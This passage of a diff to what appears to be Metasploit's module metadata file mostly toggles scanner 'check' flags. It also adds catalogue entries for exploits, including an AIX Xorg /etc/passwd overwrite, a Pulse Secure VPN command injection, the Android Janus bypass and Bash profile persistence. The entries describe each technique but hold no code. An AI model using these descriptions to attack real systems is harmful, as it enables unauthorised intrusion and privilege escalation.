     "ref_name": "scanner/ubiquiti/ubiquiti_discover",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -41988,7 +42507,7 @@
     "path": "/modules/auxiliary/scanner/udp/udp_amplification.rb",
     "is_install_path": true,
     "ref_name": "scanner/udp/udp_amplification",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42026,7 +42545,7 @@
     "path": "/modules/auxiliary/scanner/upnp/ssdp_amp.rb",
     "is_install_path": true,
     "ref_name": "scanner/upnp/ssdp_amp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42067,7 +42586,7 @@
     "path": "/modules/auxiliary/scanner/upnp/ssdp_msearch.rb",
     "is_install_path": true,
     "ref_name": "scanner/upnp/ssdp_msearch",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42108,7 +42627,7 @@
     "path": "/modules/auxiliary/scanner/varnish/varnish_cli_file_read.rb",
     "is_install_path": true,
     "ref_name": "scanner/varnish/varnish_cli_file_read",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42149,7 +42668,7 @@
     "path": "/modules/auxiliary/scanner/varnish/varnish_cli_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/varnish/varnish_cli_login",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42195,7 +42714,7 @@
     "path": "/modules/auxiliary/scanner/vmware/esx_fingerprint.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/esx_fingerprint",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42232,7 +42751,7 @@
     "path": "/modules/auxiliary/scanner/vmware/vmauthd_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/vmauthd_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -42270,7 +42789,7 @@
     "path": "/modules/auxiliary/scanner/vmware/vmauthd_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/vmauthd_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42316,7 +42835,7 @@
     "path": "/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/vmware_enum_permissions",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -42362,7 +42881,7 @@
     "path": "/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/vmware_enum_sessions",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -42408,7 +42927,7 @@
     "path": "/modules/auxiliary/scanner/vmware/vmware_enum_users.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/vmware_enum_users",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -42454,7 +42973,7 @@
     "path": "/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/vmware_enum_vms",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -42500,7 +43019,7 @@
     "path": "/modules/auxiliary/scanner/vmware/vmware_host_details.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/vmware_host_details",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -42546,7 +43065,7 @@
     "path": "/modules/auxiliary/scanner/vmware/vmware_http_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/vmware_http_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -42592,7 +43111,7 @@
     "path": "/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/vmware_screenshot_stealer",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -42642,7 +43161,7 @@
     "path": "/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/vmware_server_dir_trav",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42692,7 +43211,7 @@
     "path": "/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/vmware/vmware_update_manager_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42730,7 +43249,7 @@
     "path": "/modules/auxiliary/scanner/vnc/ard_root_pw.rb",
     "is_install_path": true,
     "ref_name": "scanner/vnc/ard_root_pw",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42778,7 +43297,7 @@
     "path": "/modules/auxiliary/scanner/vnc/vnc_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/vnc/vnc_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -42818,7 +43337,7 @@
     "path": "/modules/auxiliary/scanner/vnc/vnc_none_auth.rb",
     "is_install_path": true,
     "ref_name": "scanner/vnc/vnc_none_auth",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42862,6 +43381,50 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_scanner/vxworks/urgent11_check": {
+    "name": "URGENT/11 Scanner, Based on Detection Tool by Armis",
+    "fullname": "auxiliary/scanner/vxworks/urgent11_check",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-08-09",
+    "type": "auxiliary",
+    "author": [
+      "Ben Seri",
+      "Brent Cook",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module detects VxWorks and the IPnet IP stack, along with devices\n        vulnerable to CVE-2019-12258.",
+    "references": [
+      "CVE-2019-12258",
+      "URL-https://armis.com/urgent11",
+      "URL-https://github.com/ArmisSecurity/urgent11-detector"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-10-21 10:43:28 +0000",
+    "path": "/modules/auxiliary/scanner/vxworks/urgent11_check.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/vxworks/urgent11_check",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_scanner/vxworks/wdbrpc_bootline": {
     "name": "VxWorks WDB Agent Boot Parameter Scanner",
     "fullname": "auxiliary/scanner/vxworks/wdbrpc_bootline",
@@ -42893,7 +43456,7 @@
     "path": "/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb",
     "is_install_path": true,
     "ref_name": "scanner/vxworks/wdbrpc_bootline",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42931,7 +43494,7 @@
     "path": "/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/vxworks/wdbrpc_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -42980,7 +43543,7 @@
     "path": "/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb",
     "is_install_path": true,
     "ref_name": "scanner/winrm/winrm_auth_methods",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -43029,7 +43592,7 @@
     "path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
     "is_install_path": true,
     "ref_name": "scanner/winrm/winrm_cmd",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -43078,7 +43641,7 @@
     "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/winrm/winrm_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -43127,7 +43690,7 @@
     "path": "/modules/auxiliary/scanner/winrm/winrm_wql.rb",
     "is_install_path": true,
     "ref_name": "scanner/winrm/winrm_wql",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -43167,7 +43730,7 @@
     "path": "/modules/auxiliary/scanner/wproxy/att_open_proxy.py",
     "is_install_path": true,
     "ref_name": "scanner/wproxy/att_open_proxy",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -43212,7 +43775,7 @@
     "path": "/modules/auxiliary/scanner/wsdd/wsdd_query.rb",
     "is_install_path": true,
     "ref_name": "scanner/wsdd/wsdd_query",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -43250,7 +43813,7 @@
     "path": "/modules/auxiliary/scanner/x11/open_x11.rb",
     "is_install_path": true,
     "ref_name": "scanner/x11/open_x11",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -46156,7 +46719,7 @@
     "path": "/modules/auxiliary/voip/asterisk_login.rb",
     "is_install_path": true,
     "ref_name": "voip/asterisk_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -46287,7 +46850,7 @@
     "path": "/modules/auxiliary/voip/sip_deregister.rb",
     "is_install_path": true,
     "ref_name": "voip/sip_deregister",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -46325,7 +46888,7 @@
     "path": "/modules/auxiliary/voip/sip_invite_spoof.rb",
     "is_install_path": true,
     "ref_name": "voip/sip_invite_spoof",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -48371,6 +48934,55 @@
     },
     "needs_cleanup": true
   },
+  "exploit_aix/local/xorg_x11_server": {
+    "name": "Xorg X11 Server Local Privilege Escalation",
+    "fullname": "exploit/aix/local/xorg_x11_server",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2018-10-25",
+    "type": "exploit",
+    "author": [
+      "Narendra Shinde",
+      "Zack Flack <dzflack@gmail.com>"
+    ],
+    "description": "WARNING: Successful execution of this module results in /etc/passwd being overwritten.\n\n        This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.\n\n        A permission check flaw exists for -modulepath and -logfile options when\n        starting Xorg.  This allows unprivileged users that can start the server\n        the ability to elevate privileges and run arbitrary code under root\n        privileges.\n\n        This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.\n        Due to permission restrictions of the crontab in AIX, this module does not use cron,\n        and instead overwrites /etc/passwd in order to create a new user with root privileges.\n        All currently logged in users need to be included when /etc/passwd is overwritten,\n        else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to change user.\n        The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,\n        and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when\n        overwriting /etc/passwd.",
+    "references": [
+      "CVE-2018-14665",
+      "URL-https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html",
+      "URL-https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc",
+      "URL-https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl",
+      "EDB-45938"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "IBM AIX Version 6.1",
+      "IBM AIX Version 7.1",
+      "IBM AIX Version 7.2"
+    ],
+    "mod_time": "2019-11-11 14:28:07 +0000",
+    "path": "/modules/exploits/aix/local/xorg_x11_server.rb",
+    "is_install_path": true,
+    "ref_name": "aix/local/xorg_x11_server",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "config-changes"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_aix/rpc_cmsd_opcode21": {
     "name": "AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow",
     "fullname": "exploit/aix/rpc_cmsd_opcode21",
@@ -48758,17 +49370,71 @@
       "Old Samsung",
       "Samsung Grand"
     ],
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2019-10-23 14:45:32 +0000",
     "path": "/modules/exploits/android/local/futex_requeue.rb",
     "is_install_path": true,
     "ref_name": "android/local/futex_requeue",
-    "check": false,
+    "check": true,
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "AKA": [
+        "towelroot"
+      ]
     },
     "needs_cleanup": null
   },
+  "exploit_android/local/janus": {
+    "name": "Android Janus APK Signature bypass",
+    "fullname": "exploit/android/local/janus",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2017-07-31",
+    "type": "exploit",
+    "author": [
+      "GuardSquare",
+      "V-E-O",
+      "timwr",
+      "h00die"
+    ],
+    "description": "This module exploits CVE-2017-13156 in Android to install a payload into another\n        application. The payload APK will have the same signature and can be installed\n        as an update, preserving the existing data.\n        The vulnerability was fixed in the 5th December 2017 security patch, and was\n        additionally fixed by the APK Signature scheme v2, so only APKs signed with\n        the v1 scheme are vulnerable.\n        Payload handler is disabled, and a multi/handler must be started first.",
+    "references": [
+      "CVE-2017-13156",
+      "URL-https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures",
+      "URL-https://github.com/V-E-O/PoC/tree/master/CVE-2017-13156"
+    ],
+    "platform": "Android",
+    "arch": "dalvik",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-11-06 14:59:49 +0000",
+    "path": "/modules/exploits/android/local/janus.rb",
+    "is_install_path": true,
+    "ref_name": "android/local/janus",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "ARTIFACTS_ON_DISK",
+        "SCREEN_EFFECTS"
+      ],
+      "Stability": [
+        "SERVICE_RESOURCE_LOSS"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_android/local/put_user_vroot": {
     "name": "Android get_user/put_user Exploit",
     "fullname": "exploit/android/local/put_user_vroot",
@@ -50718,6 +51384,66 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/http/bludit_upload_images_exec": {
+    "name": "Bludit Directory Traversal Image File Upload Vulnerability",
+    "fullname": "exploit/linux/http/bludit_upload_images_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-09-07",
+    "type": "exploit",
+    "author": [
+      "christasa",
+      "sinn3r <sinn3r@metasploit.com>"
+    ],
+    "description": "This module exploits a vulnerability in Bludit. A remote user could abuse the uuid\n        parameter in the image upload feature in order to save a malicious payload anywhere\n        onto the server, and then use a custom .htaccess file to bypass the file extension\n        check to finally get remote code execution.",
+    "references": [
+      "CVE-2019-16113",
+      "URL-https://github.com/bludit/bludit/issues/1081",
+      "URL-https://github.com/bludit/bludit/commit/a9640ff6b5f2c0fa770ad7758daf24fec6fbf3f5#diff-6f5ea518e6fc98fb4c16830bbf9f5dac"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Bludit v3.9.2"
+    ],
+    "mod_time": "2019-11-11 14:47:56 +0000",
+    "path": "/modules/exploits/linux/http/bludit_upload_images_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/bludit_upload_images_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_linux/http/centreon_sqli_exec": {
     "name": "Centreon SQL and Command Injection",
     "fullname": "exploit/linux/http/centreon_sqli_exec",
@@ -51244,7 +51970,7 @@
       "Cisco RV215W 1.3.0.7",
       "Cisco RV215W 1.3.0.8"
     ],
-    "mod_time": "2019-08-30 12:03:43 +0000",
+    "mod_time": "2019-10-27 11:25:56 +0000",
     "path": "/modules/exploits/linux/http/cve_2019_1663_cisco_rmi_rce.rb",
     "is_install_path": true,
     "ref_name": "linux/http/cve_2019_1663_cisco_rmi_rce",
@@ -56018,6 +56744,73 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/http/pulse_secure_cmd_exec": {
+    "name": "Pulse Secure VPN Arbitrary Command Execution",
+    "fullname": "exploit/linux/http/pulse_secure_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-04-24",
+    "type": "exploit",
+    "author": [
+      "Orange Tsai",
+      "Meh Chang",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a post-auth command injection in the Pulse Secure\n        VPN server to execute commands as root. The env(1) command is used to\n        bypass application whitelisting and run arbitrary commands.\n\n        Please see related module auxiliary/gather/pulse_secure_file_disclosure\n        for a pre-auth file read that is able to obtain plaintext and hashed\n        credentials, plus session IDs that may be used with this exploit.\n\n        A valid administrator session ID is required in lieu of untested SSRF.",
+    "references": [
+      "CVE-2019-11539",
+      "URL-https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/",
+      "URL-https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html",
+      "URL-https://hackerone.com/reports/591295"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix In-Memory",
+      "Linux Dropper"
+    ],
+    "mod_time": "2019-12-03 10:39:58 +0000",
+    "path": "/modules/exploits/linux/http/pulse_secure_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pulse_secure_cmd_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "RelatedModules": [
+        "auxiliary/gather/pulse_secure_file_disclosure"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/http/qnap_qcenter_change_passwd_exec": {
     "name": "QNAP Q'Center change_passwd Command Execution",
     "fullname": "exploit/linux/http/qnap_qcenter_change_passwd_exec",
@@ -57559,7 +58352,7 @@
     "targets": [
       "Ubiquiti airOS < 5.6.2"
     ],
-    "mod_time": "2019-08-22 11:27:32 +0000",
+    "mod_time": "2019-10-27 11:25:56 +0000",
     "path": "/modules/exploits/linux/http/ubiquiti_airos_file_upload.rb",
     "is_install_path": true,
     "ref_name": "linux/http/ubiquiti_airos_file_upload",
@@ -58556,7 +59349,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/af_packet_chocobo_root_priv_esc",
@@ -58566,6 +59359,12 @@
     "notes": {
       "AKA": [
         "chocobo_root.c"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
       ]
     },
     "needs_cleanup": true
@@ -58606,7 +59405,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/af_packet_packet_set_ring_priv_esc",
@@ -58614,6 +59413,12 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ]
     },
     "needs_cleanup": true
   },
@@ -58741,7 +59546,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/asan_suid_executable_priv_esc",
@@ -58751,6 +59556,12 @@
     "notes": {
       "AKA": [
         "unsanitary.sh"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
       ]
     },
     "needs_cleanup": true
@@ -58794,6 +59605,45 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/local/bash_profile_persistence": {
+    "name": "Bash Profile Persistence",
+    "fullname": "exploit/linux/local/bash_profile_persistence",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "1989-06-08",
+    "type": "exploit",
+    "author": [
+      "Michael Long <bluesentinel@protonmail.com>"
+    ],
+    "description": "\"\n          This module writes an execution trigger to the target's Bash profile.\n          The execution trigger executes a call back payload whenever the target\n          user opens a Bash terminal. A handler is not run automatically, so you\n          must configure an appropriate exploit/multi/handler to receive the callback.\n        \"",
+    "references": [
+      "URL-https://attack.mitre.org/techniques/T1156/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-12-14 21:40:18 +0000",
+    "path": "/modules/exploits/linux/local/bash_profile_persistence.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/bash_profile_persistence",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/local/blueman_set_dhcp_handler_dbus_priv_esc": {
     "name": "blueman set_dhcp_handler D-Bus Privilege Escalation",
     "fullname": "exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
@@ -58941,7 +59791,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2018-12-16 14:11:54 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/bpf_sign_extension_priv_esc",
@@ -58952,6 +59802,12 @@
       "AKA": [
         "get-rekt-linux-hardened.c",
         "upstream44.c"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
       ]
     },
     "needs_cleanup": true
@@ -59346,7 +60202,7 @@
       "HP System Management Homepage 7.1.1",
       "HP System Management Homepage 7.1.2"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-05 14:26:34 +0000",
     "path": "/modules/exploits/linux/local/hp_smhstart.rb",
     "is_install_path": true,
     "ref_name": "linux/local/hp_smhstart",
@@ -59474,7 +60330,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2019-09-02 13:31:30 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/ktsuss_suid_priv_esc",
@@ -59482,6 +60338,12 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
     },
     "needs_cleanup": true
   },
@@ -59616,7 +60478,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2018-12-16 14:11:54 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/nested_namespace_idmap_limit_priv_esc",
@@ -59626,6 +60488,12 @@
     "notes": {
       "AKA": [
         "subuid_shell.c"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
       ]
     },
     "needs_cleanup": true
@@ -59641,16 +60509,21 @@
     "type": "exploit",
     "author": [
       "h00die <mike@stcyrsecurity.com>",
-      "vnik"
+      "vnik",
+      "Jesse Hertz",
+      "Tim Newsham"
     ],
-    "description": "This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently\n          only works against Ubuntu 16.04 (not 16.04.1) with kernel\n          4.4.0-21-generic.\n          Several conditions have to be met for successful exploitation:\n          Ubuntu:\n          1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n          2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n          Kernel 4.4.0-31-generic and newer are not vulnerable.\n\n          We write the ascii files and compile on target instead of locally since metasm bombs for not\n          having cdefs.h (even if locally installed)",
+    "description": "This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently\n          only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic.\n\n          Several conditions have to be met for successful exploitation:\n          Ubuntu:\n          1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n          2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n          Kernel 4.4.0-31-generic and newer are not vulnerable. This exploit does not bypass SMEP/SMAP.\n\n          We write the ascii files and compile on target instead of locally since metasm bombs for not\n          having cdefs.h (even if locally installed)",
     "references": [
       "EDB-40049",
       "CVE-2016-4997",
-      "URL-http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c"
+      "CVE-2016-4998",
+      "URL-https://www.openwall.com/lists/oss-security/2016/06/24/5",
+      "URL-http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c",
+      "URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91"
     ],
     "platform": "Linux",
-    "arch": "x86",
+    "arch": "x86, x64",
     "rport": null,
     "autofilter_ports": [
 
@@ -59661,7 +60534,7 @@
     "targets": [
       "Ubuntu"
     ],
-    "mod_time": "2018-10-10 14:12:29 +0000",
+    "mod_time": "2019-12-15 07:17:42 +0000",
     "path": "/modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb",
     "is_install_path": true,
     "ref_name": "linux/local/netfilter_priv_esc_ipv4",
@@ -59669,6 +60542,12 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ]
     },
     "needs_cleanup": true
   },
@@ -59764,6 +60643,52 @@
     },
     "needs_cleanup": true
   },
+  "exploit_linux/local/omniresolve_suid_priv_esc": {
+    "name": "Micro Focus (HPE) Data Protector SUID Privilege Escalation",
+    "fullname": "exploit/linux/local/omniresolve_suid_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-09-13",
+    "type": "exploit",
+    "author": [
+      "s7u55"
+    ],
+    "description": "This module exploits the trusted `$PATH` environment\n        variable of the SUID binary `omniresolve` in\n        Micro Focus (HPE) Data Protector A.10.40 and prior.\n\n        The `omniresolve` executable calls the `oracleasm` binary using\n        a relative path and the trusted environment `$PATH`, which allows\n        an attacker to execute a custom binary with `root` privileges.\n\n        This module has been successfully tested on:\n        HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;\n        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)\n\n        The vulnerability has been patched in:\n        Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019",
+    "references": [
+      "CVE-2019-11660",
+      "URL-https://softwaresupport.softwaregrp.com/doc/KM03525630"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Micro Focus (HPE) Data Protector <= 10.40 build 118"
+    ],
+    "mod_time": "2019-11-03 00:33:24 +0000",
+    "path": "/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/omniresolve_suid_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_linux/local/overlayfs_priv_esc": {
     "name": "Overlayfs Privilege Escalation",
     "fullname": "exploit/linux/local/overlayfs_priv_esc",
@@ -59898,6 +60823,57 @@
     },
     "needs_cleanup": true
   },
+  "exploit_linux/local/ptrace_traceme_pkexec_helper": {
+    "name": "Linux Polkit pkexec helper PTRACE_TRACEME local root exploit",
+    "fullname": "exploit/linux/local/ptrace_traceme_pkexec_helper",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-07-04",
